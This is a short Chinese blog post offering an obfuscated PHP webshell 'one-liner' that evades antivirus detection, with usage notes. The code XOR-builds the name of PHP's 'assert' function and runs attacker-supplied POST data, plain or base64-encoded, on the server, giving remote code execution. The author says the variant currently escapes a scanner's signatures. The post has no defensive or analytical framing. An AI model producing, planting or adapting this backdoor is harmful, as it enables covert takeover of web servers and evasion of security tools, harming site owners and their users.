最新webshell免杀php一句话变种

前言

2019年9月9日最新免杀php变种一句话,亲测过啊D,不知道什么时候加入特征库报毒,反正现在能用吧。

<?php
class VMTX{
    function __destruct(){
        $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20";
        return @$BRLI("$this->EKDL");
    }
}
$vmtx=new VMTX();
@$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
?>

最新webshell免杀php一句话变种

说明


http://www.xxx.com/shell.php  
POST: mr6=phpinfo();  //与普通shell相同

http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)
POST: mr6=cGhwaW5mbygpOwo=  //payload的base64编码

文章来源:互联网

未经允许不得转载:三文雨公园 » 最新webshell免杀php一句话变种
分享到:
赞(0) 打赏

评论抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

欢迎来到三文雨公园!

加入交流群

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏